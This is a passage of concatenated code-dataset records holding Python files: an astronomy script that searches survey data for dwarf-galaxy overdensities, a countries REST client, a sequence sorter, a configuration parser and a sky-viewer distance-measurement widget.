rootLogger.addHandler(fileHandler)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n rootLogger.addHandler(consoleHandler)\n #rootLogger.setLevel(logging.NOTSET)\n rootLogger.setLevel(logging.INFO)\n\n rootLogger.info(\"Searching for overdensities at RA=\"+str(ra0)+\" DEC=\"+str(dec0)+\" Radius=\"+str(radius)+\" on host=\"+host)\n #rootLogger.info(\" Temporary directory is: \"+tmpdir)\n\n\n # Either get token for anonymous user\n token = ac.login('anonymous')\n\n # Authenticated users please uncomment the next line\n #token = ac.login(input(\"Enter user name: \"),getpass(\"Enter password: \"))\n\n #df0 = getData(ra0,dec0,radius=0.01)\n #print(str(len(df0))+' objects found')\n bcatall = getDataCuts(ra0,dec0,radius=radius,colcutlo=-0.2,colcuthi=0.8,classcut=0.6,fwhmcut=1.5,errcut=0.1)\n rootLogger.info(str(len(bcatall))+' objects found')\n if len(bcatall) == 0:\n rootLogger.info('No data')\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit()\n \n # Get coverage information\n cov = getCovData(ra0,dec0,radius=radius,columns='ra,dec,pix,pix128,gcoverage,gdepth,rcoverage,rdepth')\n rootLogger.info(str(len(cov))+' coverage pixels returned')\n\n # Create the healpix map\n #NSIDE = 1024 #4096\n #map = np.zeros(hp.nside2npix(NSIDE),dtype='float')\n #map[:] = hp.UNSEEN # all unseen/masked to start\n #map = hp.ma(np.zeros(hp.nside2npix(NSIDE),dtype='float'))\n #map.mask = True\n #map[:] = hp.UNSEEN\n #objpix = hp.pixelfunc.ang2pix(NSIDE,df['ra'],df['dec'],lonlat=True)\n\n\n # Make healpix density map\n #npix = hp.nside2npix(NSIDE)\n #hist,bin_edges = np.histogram(objpix,bins=npix,range=[0,npix-1])\n #ind, = np.where(hist > 0)\n #map[ind] = hist[ind]\n #map[ind].mask = False\n\n # Downgrade the coverage map resolution\n #gcov_map2 = hp.pixelfunc.ud_grade(gcov_map,1024)\n #rcov_map2 = hp.pixelfunc.ud_grade(rcov_map,1024)\n\n #%%time\n ## 20 and 2 arcmin\n #smap1 = hp.sphtfunc.smoothing(map,fwhm=(20./60.)*(3.14159/180.),iter=1,lmax=2*NSIDE)\n #bmap1 = hp.sphtfunc.smoothing(map,fwhm=(120./60.)*(3.14159/180.),iter=1,lmax=2*NSIDE)\n #smmap1 = smap1-bmap1\n ##smmap2 = hp.sphtfunc.smoothing(map2,fwhm=(20./60.)*(3.14159/180.))\n\n # Run dwarf filter\n small_k, big_k = 2., 20. # kernel sizes in arcminutes\n try:\n raw, extent, delta, clipped, dsigma = dwarf_filter(bcatall['ra'],bcatall['dec'],fwhm_small=small_k,fwhm_big=big_k)\n except:\n rootLogger.info('Problems with dwarf filter')\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit()\n\n # find peaks\n small_k = 2.0\n mn, med, std = stats.sigma_clipped_stats(clipped,sigma=3.0,iters=5)\n nsigma = 2.5\n tbl = find_peaks(clipped,med+nsigma,box_size=small_k*2)\n rootLogger.info(str(len(tbl))+' peaks found')\n if len(tbl) == 0:\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit()\n\n # add ra & dec positions of peaks found\n a, b = extent[:2]\n xvec = np.arange(a,b,(b-a)/clipped.shape[1])\n a, b = extent[2:]\n yvec = np.arange(a,b,(b-a)/clipped.shape[0])\n\n # Not enough pixels in density image\n if (len(xvec)<2) | (len(yvec)<2):\n rootLogger.info('Not enough pixels in the density map')\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n sys.exit() \n\n\n tbl['ra'] = xvec[tbl['x_peak']]\n tbl['dec'] = yvec[-tbl['y_peak']-1]\n #print(tbl)\n rootLogger.info(str(tbl))\n\n # Make sky map of overdensities\n fig, ax = plt.subplots(figsize=(8,8))\n im = plt.imshow(clipped)\n ax.scatter(tbl['x_peak'],tbl['y_peak'],marker='s',s=tbl['peak_value']*40,c='none',edgecolors='w',lw=3) # keeps writing to previous ax\n plt.xlabel('pixel')\n plt.ylabel('pixel')\n plt.title('%d overdensities, RA=%f DEC=%f' % (len(tbl), ra0, dec0))\n plt.colorbar(label='relative spatial density after convolution');\n plt.savefig(outdir+outbase+'_skymap_peaks.png')\n\n # Create output table\n dt = np.dtype([('id',np.str_,20),('hpix',int),('num',int),('x_peak',int),('y_peak',int),('peak_value',float),('ra_peak',float),('dec_peak',float),\n ('x_centroid',float),('y_centroid',float),('ra',float),('dec',float),('asemi',float),('bsemi',float),('theta',float),\n ('back_color',float),('back_mag',float),('back_fwhm',float),('back_class_star',float),('back_gdepth',float),('back_rdepth',float),\n ('nobj',int),('color',float),('mag',float),('fwhm',float),('class_star',float),('nblue',int),('blue_mag',float),\n ('gdepth',float),('rdepth',float),\n ('pmra',float),('pmdec',float),('pmraerr',float),('pmdecerr',float),('nexp',int),('deltamjd',float)])\n peaks = None\n npeaks = len(tbl)\n if npeaks > 0:\n peaks = np.zeros(npeaks,dtype=dt)\n peaks['hpix'] = hpix\n peaks['num'] = np.arange(npeaks)+1\n tempid = np.char.add(peaks['hpix'].astype(str),'.')\n peaks['id'] = np.char.add(tempid,peaks['num'].astype(str))\n # Copying info in tbl\n peaks['x_peak'] = tbl['x_peak']\n peaks['y_peak'] = tbl['y_peak']\n peaks['peak_value'] = tbl['peak_value']\n peaks['ra_peak'] = tbl['ra']\n peaks['dec_peak'] = tbl['dec']\n # Add the \"background\" values\n columns = 'ra,dec,gmag,rmag,fwhm,class_star'\n catall = getDataCuts(ra0,dec0,radius=radius,columns=columns)\n rootLogger.info(str(len(catall))+' total objects found')\n gdcol = (catall['gmag'] < 50) & (catall['rmag'] < 50)\n if np.sum(gdcol) > 0:\n peaks['back_color'] = np.median(catall['gmag'][gdcol]-catall['rmag'][gdcol])\n else:\n peaks['back_color'] = 999999.\n gdmag = (catall['gmag'] < 50)\n if np.sum(gdmag) > 0:\n peaks['back_mag'] = np.median(catall['gmag'][gdmag])\n else:\n peaks['back_mag'] = 999999.\n peaks['back_fwhm'] = np.median(catall['fwhm'])\n peaks['back_class_star'] = np.median(catall['class_star'])\n # Depth information\n gdgdepth = (cov['gdepth'] < 50) & (cov['gdepth'] > 0)\n if np.sum(gdgdepth) > 0:\n peaks['back_gdepth'] = np.median(cov['gdepth'][gdgdepth])\n else:\n peaks['back_gdepth'] = 999999.\n gdrdepth = (cov['rdepth'] < 50) & (cov['rdepth'] > 0)\n if np.sum(gdrdepth) > 0:\n peaks['back_rdepth'] = np.median(cov['rdepth'][gdrdepth])\n else:\n peaks['back_rdepth'] = 999999.\n \n\n # Loop over the peaks and download data\n for i in range(npeaks):\n peaks0 = peaks[i]\n rootLogger.info(\" i=\"+str(i+1)+\" RA=\"+str(peaks0['ra_peak'])+\" DEC=\"+str(peaks0['dec_peak']))\n \n # Convert X/Y to RA/DEC\n #cat0 = getDataCuts(peaks0['ra'],peaks0['dec'],radius=0.1,classcut=0.6,fwhmcut=1.5)\n columns = 'ra,dec,pmra,pmdec,pmraerr,pmdecerr,ndet,deltamjd,gmag,rmag,fwhm,class_star'\n cat0 = getDataCuts(peaks0['ra_peak'],peaks0['dec_peak'],radius=0.1,columns=columns)\n print(str(len(cat0))+' objects found')\n\n # Measure the morphology around the overdensity\n shp = clipped.shape\n x0 = np.int(np.floor(peaks0['x_peak']-10))\n if x0 < 0: x0=0\n x1 = np.int(np.ceil(peaks0['x_peak']+10))\n if x1 > (shp[1]-1): x1=(shp[1]-1) # X is 2nd dimension\n y0 = np.int(np.floor(peaks0['y_peak']-10))\n if y0 < 0: y0=0\n y1 = np.int(np.ceil(peaks0['y_peak']+10))\n if y1 > (shp[0]-1): y1=(shp[0]-1) # Y is 1st dimension\n clipped0 = clipped[y0:y1+1,x0:x1+1]\n props = data_properties(clipped0)\n pcolumns = ['id', 'xcentroid', 'ycentroid', 'semimajor_axis_sigma','semiminor_axis_sigma', 'orientation']\n # semi axes in pixels and orientation in radians\n # 1 pixel is 1 armcin, good unit to use\n pcat = props.to_table(columns=pcolumns)\n peaks[i]['x_centroid'] = props['xcentroid'].value+x0\n peaks[i]['y_centroid'] = props['ycentroid'].value+y0\n peaks[i]['asemi'] = props['semimajor_axis_sigma'].value # pixel=arcmin\n peaks[i]['bsemi'] = props['semiminor_axis_sigma'].value # pixel=arcmin\n peaks[i]['theta'] = np.rad2deg(props['orientation'].value)\n # ra & dec positions of centroid\n # use xvec/yvec defined above\n xf = extrap1d(interp1d(np.arange(len(xvec)),xvec)) # function to interpolate x\n peaks[i]['ra'] = xf([peaks[i]['x_centroid']])\n yf = extrap1d(interp1d(np.arange(len(yvec)),yvec)) # function to interpolate y\n peaks[i]['dec'] = np.float( yf([len(yvec)-peaks[i]['x_centroid']-1]) )\n #peaks[i]['ra'] = xvec[peaks[i]['x_centroid']]\n #peaks[i]['dec'] = yvec[-peaks[i]['y_centroid']-1]\n\n # Add the median values for this peak\n gdcol = (cat0['gmag'] < 50) & (cat0['rmag'] < 50)\n if np.sum(gdcol) > 0:\n peaks[i]['color'] = np.median(cat0['gmag'][gdcol]-cat0['rmag'][gdcol])\n else:\n peaks[i]['color'] = 999999.\n gdmag = (cat0['gmag'] < 50)\n if np.sum(gdmag) > 0:\n peaks[i]['mag'] = np.median(cat0['gmag'][gdmag])\n else:\n peaks[i]['mag'] = 999999.\n peaks[i]['fwhm'] = np.median(cat0['fwhm'])\n peaks[i]['class_star'] = np.median(cat0['class_star'])\n peaks[i]['nobj'] = len(cat0)\n gdpm = ((np.abs(cat0['pmra']) < 1e5) & np.isfinite(cat0['pmra']) &\n (np.abs(cat0['pmdec']) < 1e5) & np.isfinite(cat0['pmdec']))\n if np.sum(gdpm) > 0:\n peaks[i]['pmra'] = np.median(cat0['pmra'][gdpm])\n peaks[i]['pmdec'] = np.median(cat0['pmdec'][gdpm])\n peaks[i]['pmraerr'] = np.median(cat0['pmraerr'][gdpm]) / np.sqrt(np.sum(gdpm))\n peaks[i]['pmdecerr'] = np.median(cat0['pmdecerr'][gdpm]) / np.sqrt(np.sum(gdpm))\n peaks[i]['nexp'] = np.median(cat0['ndet'][gdpm])\n peaks[i]['deltamjd'] = np.median(cat0['deltamjd'][gdpm])\n else:\n peaks[i]['pmra'] = 999999.\n peaks[i]['pmdec'] = 999999.\n peaks[i]['pmraerr'] = 999999.\n peaks[i]['pmdecerr'] = 999999.\n peaks[i]['nexp'] = np.median(cat0['ndet'])\n peaks[i]['deltamjd'] = np.median(cat0['deltamjd'])\n # Select only very blue stars\n gdblue = ((cat0['gmag']-cat0['rmag']) < 0.1) & (cat0['gmag'] < 50) & (cat0['rmag'] < 50)\n peaks[i]['nblue'] = np.sum(gdblue)\n if np.sum(gdblue) > 0:\n peaks[i]['blue_mag'] = np.median(cat0['gmag'][gdblue])\n else:\n peaks[i]['blue_mag'] = 999999.\n # Get coverage information\n cov0 = getCovData(peaks0['ra'],peaks0['dec'],radius=0.1,columns='ra,dec,pix,pix128,gcoverage,gdepth,rcoverage,rdepth')\n gdgdepth = (cov0['gdepth'] < 50) & (cov0['gdepth'] > 0)\n if np.sum(gdgdepth) > 0:\n peaks[i]['gdepth'] = np.median(cov0['gdepth'][gdgdepth])\n else:\n peaks[i]['gdepth'] = 999999.\n gdrdepth = (cov0['rdepth'] < 50) & (cov0['rdepth'] > 0)\n if np.sum(gdrdepth) > 0:\n peaks[i]['rdepth'] = np.median(cov0['rdepth'][gdrdepth])\n else:\n peaks[i]['rdepth'] = 999999.\n\n # Make sky map with THIS overdensity highlighted\n fig, ax = plt.subplots(figsize=(8,8))\n im = plt.imshow(clipped)\n ax.scatter(peaks['x_peak'],peaks['y_peak'],marker='s',s=peaks['peak_value']*40,c='none',edgecolors='w',lw=3) # keeps writing to previous ax\n ax.scatter(peaks0['x_peak'],peaks0['y_peak'],marker='s',s=peaks0['peak_value']*40,c='none',edgecolors='y',lw=3)\n plt.xlabel('pixel')\n plt.ylabel('pixel')\n plt.title('%d overdensities, RA=%f DEC=%f' % (npeaks, ra0, dec0))\n plt.colorbar(label='relative spatial density after convolution');\n plt.savefig(outdir+outbase+'_skymap_peak'+str(i+1)+'.png')\n\n # Make CMD for this overdensity\n fig = plt.figure(figsize=(8,8))\n plt.scatter(cat0['gmag']-cat0['rmag'],cat0['gmag'],marker='.',s=10, alpha=0.8)\n plt.xlabel('g-r')\n plt.ylabel('g')\n xlim=(-1,2)\n ylim=(25.2,14)\n plt.xlim(xlim)\n plt.ylim(ylim)\n plt.title('Overdensity CMD, %d objects RA=%f DEC=%f' % (len(cat0), peaks0['ra'], peaks0['dec']))\n plt.savefig(outdir+outbase+'_cmd'+str(i+1)+'.png')\n\n # Make CMD for this overdensity ONLY GALAXIES\n gals = cat0['class_star'] < 0.1\n fig = plt.figure(figsize=(8,8))\n plt.scatter(cat0[gals]['gmag']-cat0[gals]['rmag'],cat0[gals]['gmag'],marker='.',s=10, alpha=0.8)\n plt.xlabel('g-r')\n plt.ylabel('g')\n xlim=(-1,2)\n ylim=(25.2,14)\n plt.xlim(xlim)\n plt.ylim(ylim)\n plt.title('Overdensity CMD Galaxies, %d objects RA=%f DEC=%f' % (len(cat0), peaks0['ra'], peaks0['dec']))\n plt.savefig(outdir+outbase+'_cmd'+str(i+1)+'_gals.png')\n\n plt.close('all') # close all figures\n \n # Save the table\n rootLogger.info(\"Saving info to \"+outdir+outbase+'_peaks.fits')\n #peaks.write(outdir+outbase+'_peaks.fits')\n Table(peaks).write(outfile)\n\n # Create done file\n f = open(donefile,'w')\n f.write(host)\n f.close()\n","repo_name":"dnidever/nscdwarfs","sub_path":"python/nsc_dwarfs_hpix.py","file_name":"nsc_dwarfs_hpix.py","file_ext":"py","file_size_in_byte":25004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"37239828435","text":"import requests\nimport json\n\n\nclass Countries:\n\n def __init__(self, url):\n self.url = url\n\n def get_all(self):\n r = requests.get(self.url + '/rest/v2/all?fields=name;capital;alpha3Code')\n value = json.loads(r.text)\n if r.status_code == 200:\n for i in range(len(value)):\n print(str(i + 1) + '. Country: ' + value[i].get(\"name\") + '[' + value[i].get(\n \"alpha3Code\") + ']' + '; Capital: ', value[i].get(\"capital\"))\n else:\n print('API Returns an error')\n\n def get_capital_by_index(self, index):\n r = requests.get(self.url + '/rest/v2/all?fields=name;capital;alpha3Code')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value[index - 1].get(\"capital\")\n else:\n return 'API Returns an error: Index must be between 1 and 250'\n\n def get_country_by_index(self, index):\n r = requests.get(self.url + '/rest/v2/all?fields=name;alpha3Code')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value[index - 1].get(\"name\")\n else:\n return 'API Returns an error: Index must be between 1 and 250'\n\n def get_capital_by_code(self, code):\n r = requests.get(self.url + '/rest/v2/alpha/' + code + '?fields=capital')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value.get(\"capital\")\n else:\n return 'API Returns an error: Country Code does not exist'\n\n\n def get_capital_by_country_name(self, name):\n r = requests.get(self.url + '/rest/v2/name/' + name + '?fields=capital')\n value = json.loads(r.text)\n if r.status_code == 200:\n return value[0].get(\"capital\")\n else:\n return 'API Returns an error: Country Name does not exist'\n\n","repo_name":"alextilov/REST_01","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"24500098720","text":"def parcer_condition(cond: str) -> str:\n \"\"\"Проверка валидности условия.\"\"\"\n operators = [] # Список хранения операторов\n objects = [] # Список хранения объектов\n\n cond = cond.replace(' ', '') # Избавляемся от пробелов\n finded_operator = ''\n flag = 0\n len_cond = len(cond)\n\n # Формируем списки объектов и операторов. Проверяем строгость условий.\n for i in range(len_cond):\n\n if cond[i] == '<' or cond[i] == '>':\n\n if finded_operator == '':\n finded_operator = cond[i]\n\n if cond[i] == finded_operator:\n operators.append(cond[i])\n objects.append(cond[flag:i])\n else:\n return False\n\n flag = i+1\n\n elif cond[i] == '=':\n return False\n\n # Добавляется последний эллемент\n objects.append(cond[flag:len_cond])\n\n # Если не нашелся ни один оператор сравнения\n if finded_operator == '' or '' in objects:\n return False\n\n # Все условия определенны однозначно\n if len(set(objects)) - len(operators) != 1:\n return False\n\n parc_len = len(objects)\n dic = {}\n\n if finded_operator == '<':\n for i in range(parc_len):\n dic[objects[i]] = i\n\n else:\n for i in range(parc_len):\n dic[objects[i]] = parc_len - i\n\n return dic\n\n\ndef check_input(data: str, cond: str) -> list:\n \"\"\"Проверка входных параметров на основании условий.\"\"\"\n\n condition = parcer_condition(cond)\n\n if not condition:\n print('Ошибка создания условия')\n return False\n # Если словарь создан, Забираем ключи и разбиваем входную строку\n\n if ' ' not in data:\n print('Нет объектов для сорировки')\n return False\n\n parcer_str = data.split(' ')\n\n # Избавляемся от лишних пробелов\n\n parcer_str = [elem for elem in parcer_str if elem != '']\n\n if len(parcer_str) <= 1:\n return False\n\n keys = condition.keys()\n\n # Проверяем, все ли эллементы входной строки мы сможет отсортировать\n for i in parcer_str:\n if i not in keys:\n print('Полученные данные не удовлетворяют условиям сортировки')\n return False\n\n result = [parcer_str, condition]\n return result\n\n\ndef sort_input(data: str, cond: str) -> str:\n \"\"\"Основная функция сортировки входных данных по условию.\"\"\"\n temp_list = []\n sorted_str = ''\n input = check_input(data, cond)\n\n if not input:\n return False\n\n objects = input[0] # Входные данные\n condition = input[1] # Словарь условий\n\n # Заменяем буквы их весами\n for i in objects:\n temp_list.append(condition.get(i))\n\n # Сортируем\n temp_list.sort()\n # Делаем обратную замену от цифр к буквам и соединяем в строку\n for i in range(len(temp_list)):\n for key, value in condition.items():\n if temp_list[i] == value:\n if i == len(temp_list)-1:\n sorted_str += str(key)\n else:\n sorted_str += str(key)+' '\n\n return sorted_str\n\n\ncondition = 'З<С<К'\ninput = 'С С З С К З З З К К С З С С К З'\nprint(sort_input(input, condition))\n","repo_name":"NiMoskv/For_Automiq","sub_path":"sortirovka/sort_sequency.py","file_name":"sort_sequency.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"19644102534","text":"import numpy as np\nimport ConfigParser\nimport os\nimport logging\n\ndef get_params(param_file_path):\n\n 'Turn parameter file into parameter dictionary'\n\n config = ConfigParser.SafeConfigParser()\n config.read(param_file_path)\n\n # Get dictionaries from config object\n raw_params = dict(config.items('general'))\n raw_cats_params = dict(config.items('catalogs_to_stack'))\n raw_cats_path_params = dict(config.items('catalog_path'))\n raw_cats_file_params = dict(config.items('catalog_file'))\n raw_binning_params = dict(config.items('binning'))\n raw_maps_params = dict(config.items('maps_to_stack'))\n raw_map_path_params = dict(config.items('map_path'))\n raw_map_file_params = dict(config.items('map_file'))\n raw_noise_file_params = dict(config.items('noise_file'))\n raw_beam_params = dict(config.items('beams'))\n raw_colour_correction_params = dict(config.items('color_correction'))\n # Convert raw config dictionary to organisex dictionary params\n\n params = get_general_params(raw_params)\n params['map_files'] = get_maps_params(raw_maps_params,raw_map_path_params,raw_map_file_params)\n params['noise_files'] = get_maps_params(raw_maps_params,raw_map_path_params,raw_noise_file_params)\n params['wavelength'] = get_wavelength_params(raw_maps_params)\n params['psfs'] = get_beams_params(raw_maps_params,raw_beam_params)\n params['colour_correction'] = get_colour_correction_params(raw_maps_params,raw_colour_correction_params)\n params['catalogs'] = get_catalogs_params(raw_cats_params,raw_cats_path_params,raw_cats_file_params)\n params['bins'] = get_binning_params(raw_binning_params)\n params['library_keys'] = params['map_files'].keys()\n\n logging.info('------PARAMETER VALUES------')\n\n return params\n\ndef get_general_params(raw_params):\n\n params = {}\n params['zkey'] = raw_params['zkey']\n params['mkey'] = raw_params['mkey']\n params['ra_key'] = raw_params['ra_key']\n params['dec_key'] = raw_params['dec_key']\n try:\n params['save_bin_ids'] = string_is_true(raw_params['save_bin_ids'])\n except:\n params['save_bin_ids'] = True\n\n return params\n\ndef get_wavelength_params(raw_maps_params):\n\n wavelengths = {}\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n wavelengths[imap] = float(raw_maps_params[imap].split()[0])\n return wavelengths\n\n\ndef get_binning_params(raw_params):\n\n binning = {}\n z_nodes = []\n m_nodes = []\n for i in raw_params['redshift_nodes'].split():\n z_nodes.append(float(i))\n for j in raw_params['mass_nodes'].split():\n m_nodes.append(float(j))\n\n binning['z_nodes'] = z_nodes\n binning['m_nodes'] = m_nodes\n\n return binning\n\ndef get_maps_params(raw_maps_params,raw_map_path_params,raw_map_file_params):\n\n maps = {}\n\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n maps[imap] = raw_map_path_params[imap].split()[0] + raw_map_file_params[imap]\n\n return maps\n\ndef get_beams_params(raw_maps_params,raw_beam_params):\n psfs = {}\n\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n psfs[imap + '_beam_area'] = float(raw_beam_params[imap].split()[1])\n if is_float(raw_beam_params[imap].split()[0]) == True:\n psfs[imap+'_fwhm'] = float(raw_beam_params[imap].split()[0])\n else:\n psfs[imap+'_beam_file'] = raw_beam_params[imap].split()[0]\n return psfs\n\n\ndef get_colour_correction_params(raw_maps_params,raw_colour_correction_params):\n colour_correction = {}\n\n for imap in raw_maps_params:\n if string_is_true(raw_maps_params[imap].split()[1]) == True:\n colour_correction[imap+''] = float(raw_colour_correction_params[imap])\n\n return colour_correction\n\n\ndef get_catalogs_params(raw_cats_params,raw_cats_path_params,raw_cats_file_params):\n catalog = {}\n\n for cat in raw_cats_params:\n if string_is_true(raw_cats_params[cat].split()[0]) == True:\n catalog['catalog_path'] = str(raw_cats_path_params[cat].split()[0])\n catalog['catalog_file'] = str(raw_cats_file_params[cat])\n catalog['cat_name'] = str(cat)\n\n return catalog\n\ndef is_float(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n\ndef string_is_true(sraw):\n\n s = sraw.lower()\n true_strings = ['true','t','yes','y','1']\n false_strings = ['false','f','no','n','0']\n if s in true_strings:\n return True\n elif s in false_strings:\n return False\n else:\n logging.warning('Input not recognised for parameter %s' % (key))\n logging.warning('You providedL %s' % (sraw))\n raise\n\n\n \n \n","repo_name":"samhanrahan16/Samstack","sub_path":"sams_parameters.py","file_name":"sams_parameters.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"11752457725","text":"from datetime import datetime\n\nimport astropy.units as u\nimport ipyvue as v\nimport requests\nfrom astropy.coordinates import Angle, SkyCoord\nfrom cosmicds.utils import RepeatedTimer, load_template, API_URL\nfrom ipywidgets import DOMWidget, widget_serialization\nfrom pywwt.jupyter import WWTJupyterWidget\nfrom traitlets import Instance, Bool, Float, Int, Unicode, observe, Dict\n\nfrom ...utils import GALAXY_FOV, HUBBLE_ROUTE_PATH, angle_to_json, \\\n angle_from_json\n\n\nclass DistanceTool(v.VueTemplate):\n template = load_template(\"distance_tool.vue\", __file__, traitlet=True).tag(\n sync=True)\n widget = Instance(DOMWidget, allow_none=True).tag(sync=True,\n **widget_serialization)\n measuring = Bool().tag(sync=True)\n measuredDistance = Float().tag(sync=True)\n angular_size = Instance(Angle).tag(sync=True, to_json=angle_to_json,\n from_json=angle_from_json)\n angular_height = Instance(Angle).tag(sync=True, to_json=angle_to_json,\n from_json=angle_from_json)\n height = Int().tag(sync=True)\n width = Int().tag(sync=True)\n view_changing = Bool(False).tag(sync=True)\n measuring_allowed = Bool(False).tag(sync=True)\n show_ruler = Bool(False).tag(sync=True)\n fov_text = Unicode().tag(sync=True)\n flagged = Bool(False).tag(sync=True)\n ruler_click_count = Int().tag(sync=True)\n measurement_count = Int().tag(sync=True)\n galaxy_selected = Bool(False).tag(sync=True)\n _ra = Angle(0 * u.deg)\n _dec = Angle(0 * u.deg)\n wwtStyle = Dict().tag(sync=True)\n reset_style = Bool(False).tag(sync=True)\n \n # Guard\n guard = Bool(False).tag(sync=True)\n galaxy_max_size = Angle(\"60 arcmin\") # 2 x Pinwheel galaxy (d = 7 Mpc, r = 1.7 Rmw)\n galaxy_min_size = Angle(\"6 arcsec\") # 3 x sdss resoltuion\n bad_measurement = Bool(False).tag(sync=True)\n\n UPDATE_TIME = 1 # seconds\n START_COORDINATES = SkyCoord(180 * u.deg, 25 * u.deg, frame='icrs')\n\n def __init__(self, *args, **kwargs):\n self.widget = WWTJupyterWidget(hide_all_chrome=True)\n self._setup_widget()\n self.measuring = kwargs.get('measuring', False)\n self.guard = kwargs.get('guard', False)\n self.angular_size = Angle(0, u.deg)\n self.angular_height = Angle(60, u.deg)\n self.widget._set_message_type_callback('wwt_view_state',\n self._handle_view_message)\n self.last_update = datetime.now()\n self._rt = RepeatedTimer(self.UPDATE_TIME, self._check_view_changing)\n self.update_text()\n super().__init__(*args, **kwargs)\n\n def _setup_widget(self):\n # Temp update to set background to SDSS. Once we remove galaxies without SDSS WWT tiles from the catalog, make background DSS again, and set wwt.foreground_opacity = 0, per Peter Williams.\n self.widget.background = 'SDSS: Sloan Digital Sky Survey (Optical)'\n self.widget.foreground = 'SDSS: Sloan Digital Sky Survey (Optical)'\n self.widget.center_on_coordinates(self.START_COORDINATES, fov= 42 * u.arcmin, #start in close enough to see galaxies\n instant=True)\n\n def reset_canvas(self):\n self.send({\"method\": \"reset\", \"args\": []})\n\n def update_text(self):\n self.send({\"method\": \"update_text\", \"args\": []})\n\n def _height_from_pixel_str(self, s):\n return int(s[:-2]) # Remove the 'px' from the end\n\n # We aren't always guaranteed to get an update from the WWT viewer\n # so every second, if the view is marked as changing, \n # we check when the last update that we got is\n # If it's more than a second old, mark the view as not changing\n def _check_view_changing(self):\n if self.view_changing:\n delta = datetime.now() - self.last_update\n if delta.total_seconds() >= self.UPDATE_TIME:\n self.view_changing = False\n\n def vue_toggle_measuring(self, _args=None):\n self.measuring = not self.measuring\n self.ruler_click_count += 1\n\n @observe('measuredDistance')\n def _on_measured_distance_changed(self, change):\n fov = self.widget.get_fov()\n widget_height = self._height_from_pixel_str(self.widget.layout.height)\n ang_size = Angle(((change[\"new\"] / widget_height) * fov))\n valid = self.validate_angular_size(ang_size, True)\n # print(ang_size, change[\"new\"], valid)\n # if valid:\n # print('valid measurement')\n self.angular_size = ang_size\n self.measurement_count += 1\n\n @observe('measuring')\n def _on_measuring_changed(self, measuring):\n if not measuring[\"new\"]:\n self.reset_canvas()\n\n @observe(\"angular_height\")\n def _on_fov_change(self, change):\n d, m, s = change[\"new\"].dms\n m = m + s / 60\n d = d + m / 60\n s = int(s)\n if d > 9.95: # to avoid edge case where you can get 10 between 10 and 11 and 10.0 from 9.95-10\n self.fov_text = f\"{d:.0f}°\"\n elif d > 0.99: # to avoid edge case where you can get 60.0 arcmin from 59.5-59.9 arcmin\n self.fov_text = f\"{d:.1f}°\"\n elif m > 9.95:\n self.fov_text = f\"{m:.0f}'\"\n elif m > 0.99:\n self.fov_text = f\"{m:.1f}'\"\n else:\n self.fov_text = f\"{s}\\\"\"\n self.update_text()\n\n def _handle_view_message(self, wwt, _updated):\n fov = Angle(self.widget.get_fov())\n center = self.widget.get_center()\n ra = Angle(center.ra)\n dec = Angle(center.dec)\n changing = not u.allclose([fov, ra, dec],\n [self.angular_height, self._ra, self._dec])\n self.angular_height = fov\n self._ra = ra\n self._dec = dec\n self.view_changing = changing\n self.last_update = datetime.now()\n\n def go_to_location(self, ra, dec, fov=GALAXY_FOV):\n coordinates = SkyCoord(ra * u.deg, dec * u.deg, frame='icrs')\n self.widget.center_on_coordinates(coordinates, fov=fov, instant=True)\n \n def reset_brightness_contrast(self):\n self.wwtStyle = {}\n # toggle reset style to trigger watch in vue\n self.reset_style = True\n self.reset_style = False\n \n def activate_guard(self):\n self.guard = True\n \n def deactivate_guard(self):\n self.guard = False\n self.bad_measurement = False\n \n def set_guard(self, max = None, min = None):\n self.activate_guard()\n self.galaxy_max_size = Angle(max) if max is not None else self.galaxy_max_size\n self.galaxy_min_size = Angle(min) if min is not None else self.galaxy_min_size\n \n def validate_angular_size(self, angular_size, check = True):\n if not self.guard:\n return True\n if not check:\n return self.bad_measurement\n max_wwt_size = Angle(\"60 deg\")\n c1 = (angular_size < max_wwt_size) \n c2 = (angular_size >= self.galaxy_min_size) \n c3 = (angular_size <= self.galaxy_max_size)\n self.bad_measurement = not (c1 and c2 and c3)\n return c1 and c2 and c3\n \n ","repo_name":"cosmicds/hubbleds","sub_path":"src/hubbleds/components/distance_tool/distance_tool.py","file_name":"distance_tool.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"41925232654","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 9 20:59:05 2021\n\n\n@author: PRAJWAL\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Dropout\nfrom sklearn.model_selection import train_test_split\nimport os\nfrom sklearn import svm\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.ensemble import RandomForestRegressor\n\ndef predict_weather(list):\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n print('dir_path --- ', dir_path)\n data = pd.read_csv(dir_path+\"/city_day.csv\")\n\n data = data.dropna(subset=['AQI_Bucket'])\n\n data_a = 